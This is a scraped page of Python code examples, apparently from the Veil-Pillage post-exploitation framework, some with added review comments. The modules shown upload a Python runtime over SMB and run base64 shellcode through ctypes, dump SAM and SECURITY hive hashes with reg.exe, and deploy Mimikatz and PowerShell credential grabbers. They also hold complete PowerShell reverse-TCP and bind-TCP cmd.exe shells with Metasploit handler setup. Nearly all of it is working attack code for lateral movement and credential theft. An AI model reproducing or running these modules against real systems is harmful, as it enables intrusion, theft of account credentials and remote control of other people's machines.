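            uploadResult = smb.uploadFiles(target, username, password, "C$",
                                           "\\Windows\\Temp\\",
                                           [zipPath, pythonPath])

            if uploadResult != "success":
                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
                print(helpers.color(
                    "[!] 7za.exe and python.zip unsuccessfully uploaded to " +
                    target + "\n",
                    warning=True))
                continue

            self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"

            print(helpers.color(" [*] Triggering 7zip unzip command on " +
                                target))
            command_methods.executeCommand(target, username, password,
                                           unzipCommand, triggerMethod)
            self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

            # NOTE(review): the inject is fired straight after the unzip; if
            # executeCommand returns before 7za has finished extracting, this
            # races the extraction -- confirm against the trigger method used.
            print(helpers.color(" [*] Triggering 'python -c' command on " +
                                target))
            command_methods.executeCommand(target, username, password,
                                           pythonCMD, triggerMethod)
            self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

            # build our cleanup file -> kill all python processes and delete the environments
            killCMD = "taskkill /f /im python.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
            # command to delete the python extracted directory, zipped python environment and 7za.exe binary
            delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n"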
コード例 #28
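    def run(self):
        """
        Upload a minimal Python environment to each target and execute
        Veil-Evasion shellcode through ``python.exe -c`` and ctypes.

        Per target: 7za.exe and python.zip are uploaded over SMB to
        C:\\Windows\\Temp, the archive is extracted, then python.exe is run
        with a one-liner that base64-decodes the shellcode into a
        create_string_buffer and calls it. Cleanup entries that kill
        python.exe and delete the uploaded environment are appended to
        ``self.cleanup``.

        Reads ``self.creds[0]``, the required options trigger_method and
        spawn_handler, and ``self.args`` msfpayload / msfoptions / custshell.
        Status lines appended to ``self.output`` and ``self.cleanup`` contain
        the plaintext password, as elsewhere in this module, so treat those
        files as sensitive.
        """

        handlerPath = "none"

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # base64 our shellcode (generate() yields a "\x.." escaped string)
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # command to spawn msfconsole with a handler script in a new terminal tab
        handlerCmdTemplate = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '%s'\""

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                os.system(handlerCmdTemplate % handlerPath)
                raw_input("\n\n [>] Press enter when handler is ready: ")
            else:
                # previously silent: the payload would fire with nothing listening
                print(helpers.color(" [!] Warning: no handler script was generated, continuing without a handler", warning=True))

        # otherwise, if we have a custom handler path, try to invoke that.
        # NOTE(review): handlerPath is a local initialised to "none" above and
        # only reassigned in the spawn_handler branch, so this branch cannot run
        # until a custom handler option is actually wired in.
        elif handlerPath.lower() != "none":
            # a handler .rc is a file, not a directory
            if os.path.isfile(handlerPath):
                os.system(handlerCmdTemplate % handlerPath)
                raw_input("\n [>] Press enter when handler is ready: ")
            else:
                print(helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!"))

        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe"

        # command to invoke shellcode using python
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc)
        # path to the minimal python install
        pythonPath = settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip"

        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])

            if uploadResult != "success":
                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
                print(helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True))
                continue

            self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"

            print(helpers.color(" [*] Triggering 7zip unzip command on " + target))
            command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
            self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

            # NOTE(review): the inject is fired straight after the unzip; if
            # executeCommand returns before 7za has finished extracting, this
            # races the extraction -- confirm against the trigger method used.
            print(helpers.color(" [*] Triggering 'python -c' command on " + target))
            command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
            self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

            # build our cleanup file -> kill all python processes and delete the environments
            killCMD = "taskkill /f /im python.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
            # command to delete the python extracted directory, zipped python environment and 7za.exe binary
            delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n"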
コード例 #29
ファイル: hashdump.py プロジェクト: johnjohnsp1/Veil-Pillage
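    def run(self):
        """
        Dump local account hashes from each target by saving the SYSTEM,
        SECURITY and SAM hives with reg.exe and parsing them offline.

        Per target: ``reg save`` writes the hives to C:\\Windows\\Temp, they
        are pulled back over SMB (and removed from the target), written into a
        private local scratch directory and fed to
        ``creddump.dump_file_hashes``. Results go through
        ``helpers.saveModuleFile`` and a deduplicated list of every hash seen
        is appended to ``self.output`` at the end.

        Reads ``self.creds[0]`` and ``required_options["trigger_method"]``.
        Status lines in ``self.output`` include the plaintext password.
        """
        # function-scope imports: the file's import block is not in view
        import shutil
        import tempfile

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # let's keep track of ALL hashes found
        allHashes = ""

        # reg.exe command to save off the hives
        regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

        # where the hives land on the target, keyed by the local file name
        hivePaths = [
            ("system", "C:\\Windows\\Temp\\system"),
            ("security", "C:\\Windows\\Temp\\security"),
            ("sam", "C:\\Windows\\Temp\\sam"),
        ]

        # private scratch directory instead of the fixed /tmp/system etc.:
        # the copies contain the SAM, and a predictable path in a shared /tmp
        # can be pre-created or symlinked by another local user
        workDir = tempfile.mkdtemp(prefix="veil-hashdump-")
        try:
            for target in self.targets:

                print(helpers.color("\n [*] Dumping hashes on " + target))

                # execute the registry save command
                command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # fresh per-target local copies, so a hive that is missing on
                # this target is never silently replaced by the previous one's
                localHives = {}
                for name, remotePath in hivePaths:
                    localPath = os.path.join(workDir, name)
                    if os.path.exists(localPath):
                        os.remove(localPath)

                    # pull the hive back and delete it from the target; leaving
                    # SAM/SECURITY copies in C:\Windows\Temp is a needless exposure
                    data = smb.getFile(target, username, password, remotePath, delete=True)

                    if data == "":
                        # report the remote path (the original printed the empty payload)
                        self.output += "[!] File '" + remotePath + "' from " + target + " empty or doesn't exist\n"
                    else:
                        # hives are binary; close the handle before creddump opens it
                        with open(localPath, "wb") as f:
                            f.write(data)
                        localHives[name] = localPath

                # creddump needs SYSTEM (bootkey) and SAM; SECURITY is optional
                if "system" in localHives and "sam" in localHives:
                    # get all the hashes from these hives
                    hashes = creddump.dump_file_hashes(localHives["system"], localHives["sam"])

                    # add the hashes to our global list
                    allHashes += hashes

                    # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
                    saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)

                    self.output += (
                        "[*] dumped hashes (reg.exe) using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " saved to "
                        + saveLocation
                        + "\n"
                    )

                else:
                    self.output += (
                        "[!] Error executing hashdump using creds '" + username + ":" + password + "' on " + target + "\n"
                    )
        finally:
            # never leave the local hive copies behind
            shutil.rmtree(workDir, ignore_errors=True)

        if allHashes != "":
            # get all non-empty hashes, uniquify and sort them
            allHashes = [p.lower() for p in allHashes.split("\n") if p != ""]
            allHashes = sorted(set(allHashes))
            self.output += "[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"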
コード例 #30
ファイル: autograb.py プロジェクト: 5l1v3r1/Veil-Pillage-1
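    def run(self):
        """
        Grab credentials from each target: local hashes plus in-memory logon
        credentials (Mimikatz).

        If PowerShell is usable on the target (or force_method says so), the
        combined Invoke-Mimikatz/powerdump script data/misc/autograb.ps1 is
        delivered with ``delivery_methods.powershellHostTrigger`` and its
        output file pulled back. Otherwise the SYSTEM/SECURITY/SAM hives are
        saved with reg.exe and parsed locally with creddump, and the
        architecture-matching mimikatz binary is hosted over SMB and run with
        ``delivery_methods.hostTrigger``.

        Reads ``self.creds[0]`` and the required options lhost, use_ssl,
        force_method, delay and out_file. Appends per-target results and the
        deduplicated credential lists to ``self.output``; those lines include
        the plaintext password.
        """
        # function-scope imports: the file's import block is not in view
        import shutil
        import tempfile

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # the temporary output file we will write to on the target (hoisted:
        # it is the same for every target and every grab method)
        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

        # reg.exe command to save off the hives, and where they land on the target
        regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
        hivePaths = [
            ("system", "C:\\Windows\\Temp\\system"),
            ("security", "C:\\Windows\\Temp\\security"),
            ("sam", "C:\\Windows\\Temp\\sam"),
        ]

        # private scratch directory for hive copies instead of the fixed
        # /tmp/system etc.: predictable, shared with other local users, and
        # previously reused across targets
        workDir = tempfile.mkdtemp(prefix="veil-autograb-")

        try:
            for target in self.targets:

                powershellInstalled = False

                # check if we're forcing a particular grab method
                if force_method.lower() == "binary":
                    powershellInstalled = False
                elif force_method.lower() == "powershell":
                    powershellInstalled = True
                else:
                    # check if we have a functional Powershell installation
                    powershellCommand = "powershell.exe -c \"$a=42;$a\""
                    powershellResult = command_methods.executeResult(
                        target, username, password, powershellCommand, "wmis")
                    if powershellResult.strip() == "42":
                        powershellInstalled = True

                if powershellInstalled:

                    # do powersploit combined file of invoke-mimikatz and powerdump
                    print(helpers.color("\n [*] Powershell installed on " + target))
                    self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                    # path to the combined Invoke-Mimikatz/powerdump powershell script
                    secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                    # trigger the powershell download on just this target
                    delivery_methods.powershellHostTrigger(target,
                                                           username,
                                                           password,
                                                           secondStagePath,
                                                           lhost,
                                                           "",
                                                           triggerMethod="winexe",
                                                           outFile=out_file,
                                                           ssl=use_ssl,
                                                           noArch=True)

                    print("\n [*] Waiting " + delay + "s for Autograb to run...")
                    time.sleep(int(delay))

                    # grab the output file and delete it
                    out = smb.getFile(target, username, password, out_file, delete=True)

                    # save the file off to the appropriate location
                    saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

                    # parse the mimikatz output and append it to our globals
                    (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                    allmsv.extend(msv1_0)
                    allkerberos.extend(kerberos)
                    allwdigest.extend(wdigest)
                    alltspkg.extend(tspkg)

                    # parse the powerdump component
                    allhashes.extend(helpers.parseHashdump(out))

                    if out != "":
                        self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                    else:
                        self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

                else:
                    # do reg.exe for hashdump and host/execute for mimikatz
                    print(helpers.color("\n [!] Powershell not installed on " + target, warning=True))
                    print(helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target))
                    self.output += "[!] Powershell not installed on " + target + "\n"

                    # execute the registry save command
                    command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")

                    print(helpers.color("\n [*] Dumping hashes on " + target))

                    # sleep for 5 seconds to let everything backup
                    time.sleep(5)

                    # pull the hives back (removing them from the target -- SAM
                    # copies in C:\Windows\Temp are a needless exposure) into
                    # fresh per-target local files, so a missing hive is never
                    # silently replaced by the previous target's copy
                    localHives = {}
                    for name, remotePath in hivePaths:
                        localPath = os.path.join(workDir, name)
                        if os.path.exists(localPath):
                            os.remove(localPath)
                        data = smb.getFile(target, username, password, remotePath, delete=True)
                        if data == "":
                            # report the remote path (the original printed the empty payload)
                            self.output += "[!] File '" + remotePath + "' from " + target + " empty or doesn't exist\n"
                        else:
                            with open(localPath, "wb") as f:
                                f.write(data)
                            localHives[name] = localPath

                    # creddump needs SYSTEM (bootkey) and SAM; skip instead of
                    # parsing missing or stale files
                    if "system" in localHives and "sam" in localHives:
                        # get all the hashes from these hives
                        out = creddump.dump_file_hashes(localHives["system"], localHives["sam"])

                        # save the output file off
                        saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
                        self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

                        # save these off to the universal list
                        allhashes.extend(helpers.parseHashdump(out))
                    else:
                        self.output += "[!] Error dumping hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + "\n"

                    # now, detect the architecture
                    archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                    archResult = command_methods.executeResult(
                        target, username, password, archCommand, "wmis")
                    arch = "x64" if "64" in archResult else "x86"

                    # now time for ze mimikatz!
                    mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                    exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

                    # host mimikatz.exe and trigger it ONLY on this particular machine
                    # so we can get the architecture correct
                    delivery_methods.hostTrigger(target,
                                                 username,
                                                 password,
                                                 mimikatzPath,
                                                 lhost,
                                                 triggerMethod="wmis",
                                                 exeArgs=exeArgs)

                    print("\n [*] Waiting " + delay + "s for Mimikatz to run...")
                    time.sleep(int(delay))

                    # grab the output file and delete it
                    out = smb.getFile(target, username, password, out_file, delete=True)

                    # parse the mimikatz output and append it to our globals
                    (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                    allmsv.extend(msv1_0)
                    allkerberos.extend(kerberos)
                    allwdigest.extend(wdigest)
                    alltspkg.extend(tspkg)

                    # save the file off to the appropriate location
                    saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

                    if out != "":
                        self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                    else:
                        self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
        finally:
            # never leave the local hive copies behind
            shutil.rmtree(workDir, ignore_errors=True)

        # final deduplicated summaries
        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"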
コード例 #31
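    def run(self):
        """
        Launch a pure-PowerShell cmd.exe shell on each target.

        ``shell`` selects ``rev_tcp`` (the target connects back to lhost:lport;
        a windows/shell_reverse_tcp msfconsole .rc is generated and, when
        spawn_handler is true, started in a new terminal tab) or ``bind_tcp``
        (the target listens on lport). The script is encoded with
        ``helpers.encPowershell`` and run via ``command_methods.executeCommand``
        with the configured trigger_method. A ``taskkill /f /im powershell.exe``
        cleanup entry is recorded per target.

        Returns "" (after prompting) on an unrecognised ``shell``, a missing
        lhost for rev_tcp, or a non-numeric lport; otherwise None.
        Output and cleanup lines contain the plaintext password, as in the
        rest of the module.
        """
        # function-scope import: the file's import block is not in view
        import tempfile

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        shell = self.required_options["shell"][0]
        lhost = self.required_options["lhost"][0]
        lport = self.required_options["lport"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # lport is spliced verbatim into the PowerShell script and the handler
        # .rc; a bad value only fails later and silently on the target
        if not str(lport).isdigit() or not 0 < int(lport) < 65536:
            print(helpers.color(" [!] 'lport' must be a TCP port number (1-65535)! ",
                                warning=True))
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # start building the handler in case we want to invoke it
        handler = "use exploit/multi/handler"

        # the pure powershell windows_reverse_tcp shell
        revTCPShell = """function cleanup {
if ($c.Connected -eq $true) {$c.Close()}
if ($p.ExitCode -ne $null) {$p.Close()}
exit}
$c = New-Object system.net.sockets.tcpclient
$c.connect('%s','%s')
$stream = $c.GetStream()
$n = New-Object System.Byte[] $c.ReceiveBufferSize
$p = New-Object System.Diagnostics.Process
$p.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$p.StartInfo.RedirectStandardInput = 1
$p.StartInfo.RedirectStandardOutput = 1
$p.StartInfo.UseShellExecute = 0
$p.Start()
$is = $p.StandardInput
$o = $p.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($o.Peek() -ne -1){$out += $encoding.GetString($o.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false;
while (-not $done) {
if ($c.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $n.Length)) {
$read = $stream.Read($n,$pos,$n.Length - $pos)
$pos+=$read; if ($pos -and ($n[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($n,0,$pos)
$is.write($string)
start-sleep 1
if ($p.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($o.Read())
while($o.Peek() -ne -1){
$out += $encoding.GetString($o.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}""" % (lhost, lport)

        # the pure powershell bind_tcp shell
        bindTCPShell = """$en = new-object System.Text.AsciiEncoding
$ep = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "%s")
$l = new-object System.Net.Sockets.TcpListener $ep
$l.start()
$socket = $l.AcceptTcpClient()
$ns = $socket.GetStream()
$nb = New-Object System.Byte[] $socket.ReceiveBufferSize
$p = New-Object System.Diagnostics.Process 
$p.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
$p.StartInfo.RedirectStandardInput = 1
$p.StartInfo.RedirectStandardOutput = 1
$p.StartInfo.UseShellExecute = 0
$p.Start()
$is = $p.StandardInput
$os = $p.StandardOutput
Start-Sleep 1
while($os.Peek() -ne -1){ $string += $en.GetString($os.Read())}
$ns.Write($en.GetBytes($string),0,$string.Length)
$string = '' 
$done = $false
while (-not $done) {
    $pos = 0
    $i = 1
    while (($i -gt 0) -and ($pos -lt $nb.Length)) {
                    $read = $ns.Read($nb,$pos,$nb.Length - $pos)
        $pos+=$read
        if ($pos -and ($nb[0..$($pos-1)] -contains 10)){break}}
    if ($pos -gt 0) {
        $string = $en.GetString($nb,0,$pos)
        $is.write($string)
        $out = $en.GetString($os.Read())
        while($os.Peek() -ne -1){$out += $en.GetString($os.Read())}
        $ns.Write($en.GetBytes($out),0,$out.length)
        $out = $null} else {$done = $true}}
        """ % (lport)

        # if the user specified a reverse_tcp shell
        if shell.lower() == "rev_tcp":
            # make sure we have lhost filled in
            if lhost == "none":
                print(helpers.color(" [!] 'lhost' required for rev_tcp! ",
                                    warning=True))
                raw_input("\n [>] Press enter to continue: ")
                return ""

            # get the encoded powershell trigger command
            triggerCMD = helpers.encPowershell(revTCPShell)
            handler += "\nset PAYLOAD windows/shell_reverse_tcp"
            handler += "\nset LHOST " + lhost
            handler += "\nset LPORT " + lport
            handler += "\nset ExitOnSession false"
            handler += "\nexploit -j\n"

            # write the .rc to a private temp file rather than a fixed
            # /tmp/handler.rc: msfconsole -r executes whatever that file holds,
            # and a predictable name in a shared /tmp can be pre-created or
            # swapped by another local user before it is read
            fd, handlerPath = tempfile.mkstemp(prefix="veil-handler-", suffix=".rc")
            with os.fdopen(fd, "w") as f:
                f.write(handler)
            print(helpers.color(" [*] Handler script written to " + handlerPath))

            # build and spawn a handler for the reverse shell
            if spawnHandler.lower() == "true":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # bind_tcp shell is easier :)
        elif shell.lower() == "bind_tcp":
            triggerCMD = helpers.encPowershell(bindTCPShell)
        else:
            print(helpers.color(
                "\n [!] Shell not recognized: please enter rev_tcp or bind_tcp\n",
                warning=True))
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # execute the powershell trigger command on each target
        for target in self.targets:
            # trigger the command and set output as appropriate
            print("\n [*] Triggering powershell shell '" + shell.lower(
            ) + "' with lhost=" + lhost + " and lport=" + lport + " on " + target)
            self.output += "[*] Triggering powershell shell '" + shell.lower(
            ) + "' with lhost=" + lhost + " and lport=" + lport + " using creds '" + username + ":" + password + "' on " + target + "\n"
            command_methods.executeCommand(target, username, password,
                                           triggerCMD, triggerMethod)

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"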
    def run(self):
        """Build a PowerShell cmd.exe shell payload and trigger it on every target.

        Reads ``trigger_method``, ``shell``, ``lhost``, ``lport`` and
        ``spawn_handler`` from ``self.required_options`` and uses only the
        first credential pair in ``self.creds``.  ``shell`` selects one of
        two inline PowerShell scripts: ``rev_tcp`` (connects out to
        lhost:lport) or ``bind_tcp`` (listens on lport).  For ``rev_tcp`` a
        Metasploit resource script is written to ``/tmp/handler.rc`` and,
        when ``spawn_handler`` is ``true``, msfconsole is launched with it
        in a new gnome-terminal tab.  The encoded trigger is then run on
        each target through ``command_methods.executeCommand`` and a
        ``taskkill`` entry for ``powershell.exe`` is appended to
        ``self.cleanup``.

        Returns ``""`` (after an interactive prompt) when ``lhost`` is
        missing for ``rev_tcp`` or when ``shell`` is not recognised;
        otherwise falls off the end and returns None.

        Side effects worth knowing from a handling/IR standpoint:
        ``self.output`` and ``self.cleanup`` both receive the plaintext
        ``username:password`` pair, so anything that persists or displays
        those strings is storing credential material.  The method is
        Python 2 only (``print`` statement, ``raw_input``).
        """

        # assume single set of credentials
        # NOTE: any additional credential pairs in self.creds are ignored.
        username, password = self.creds[0]

        # Option values are used as-is: lhost is only validated for rev_tcp
        # (the "none" check below) and lport is never validated before being
        # interpolated into the PowerShell scripts.
        triggerMethod = self.required_options["trigger_method"][0]
        shell = self.required_options["shell"][0]
        lhost = self.required_options["lhost"][0]
        lport = self.required_options["lport"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # start building the handler in case we want to invoke it
        # (only completed and written to disk in the rev_tcp branch)
        handler = "use exploit/multi/handler"

        # the pure powershell windows_reverse_tcp shell
        # Connects out to lhost:lport, starts cmd.exe with stdin/stdout
        # redirected and relays between the socket and the process; the
        # inline `cleanup` function closes the socket/process on disconnect
        # or process exit.  lhost/lport are substituted via %s, unescaped.
        revTCPShell = """function cleanup {
if ($c.Connected -eq $true) {$c.Close()}
if ($p.ExitCode -ne $null) {$p.Close()}
exit}
$c = New-Object system.net.sockets.tcpclient
$c.connect('%s','%s')
$stream = $c.GetStream()
$n = New-Object System.Byte[] $c.ReceiveBufferSize
$p = New-Object System.Diagnostics.Process
$p.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$p.StartInfo.RedirectStandardInput = 1
$p.StartInfo.RedirectStandardOutput = 1
$p.StartInfo.UseShellExecute = 0
$p.Start()
$is = $p.StandardInput
$o = $p.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($o.Peek() -ne -1){$out += $encoding.GetString($o.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false;
while (-not $done) {
if ($c.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $n.Length)) {
$read = $stream.Read($n,$pos,$n.Length - $pos)
$pos+=$read; if ($pos -and ($n[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($n,0,$pos)
$is.write($string)
start-sleep 1
if ($p.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($o.Read())
while($o.Peek() -ne -1){
$out += $encoding.GetString($o.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}""" %(lhost, lport)

        # the bind_tcp variant: listens on every interface at lport and
        # accepts a single client.  Unlike the rev_tcp script there is no
        # cleanup routine -- an empty read just sets $done and the loop ends.
        # Only lport is substituted (one %s), unescaped.
        bindTCPShell = """$en = new-object System.Text.AsciiEncoding
$ep = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "%s")
$l = new-object System.Net.Sockets.TcpListener $ep
$l.start()
$socket = $l.AcceptTcpClient()
$ns = $socket.GetStream()
$nb = New-Object System.Byte[] $socket.ReceiveBufferSize
$p = New-Object System.Diagnostics.Process 
$p.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
$p.StartInfo.RedirectStandardInput = 1
$p.StartInfo.RedirectStandardOutput = 1
$p.StartInfo.UseShellExecute = 0
$p.Start()
$is = $p.StandardInput
$os = $p.StandardOutput
Start-Sleep 1
while($os.Peek() -ne -1){ $string += $en.GetString($os.Read())}
$ns.Write($en.GetBytes($string),0,$string.Length)
$string = '' 
$done = $false
while (-not $done) {
    $pos = 0
    $i = 1
    while (($i -gt 0) -and ($pos -lt $nb.Length)) {
                    $read = $ns.Read($nb,$pos,$nb.Length - $pos)
        $pos+=$read
        if ($pos -and ($nb[0..$($pos-1)] -contains 10)){break}}
    if ($pos -gt 0) {
        $string = $en.GetString($nb,0,$pos)
        $is.write($string)
        $out = $en.GetString($os.Read())
        while($os.Peek() -ne -1){$out += $en.GetString($os.Read())}
        $ns.Write($en.GetBytes($out),0,$out.length)
        $out = $null} else {$done = $true}}
        """ %(lport)

        # if the user specified a reverse_tcp shell
        if shell.lower() == "rev_tcp":
            # make sure we have lhost filled in
            if lhost == "none":
                print helpers.color(" [!] 'lhost' required for rev_tcp! ", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

            # get the encoded powershell trigger command
            # (helpers.encPowershell is not visible here; presumably it
            # produces an encoded-command form of the script -- verify)
            triggerCMD = helpers.encPowershell(revTCPShell)
            handler += "\nset PAYLOAD windows/shell_reverse_tcp"
            handler += "\nset LHOST " + lhost
            handler += "\nset LPORT " + lport
            handler += "\nset ExitOnSession false"
            handler += "\nexploit -j\n"
            # The resource script goes to a fixed, predictable path in /tmp
            # and is overwritten on every run; it holds only the handler
            # settings above (no credentials).  Closed explicitly rather
            # than via `with`.
            f = open('/tmp/handler.rc', 'w')
            f.write(handler)
            f.close()

            # build and spawn a handler for the reverse shell
            if spawnHandler.lower() == "true":
                handlerPath = "/tmp/handler.rc"
                # command to spawn a new tab
                # os.system runs this through a shell; handlerPath is a
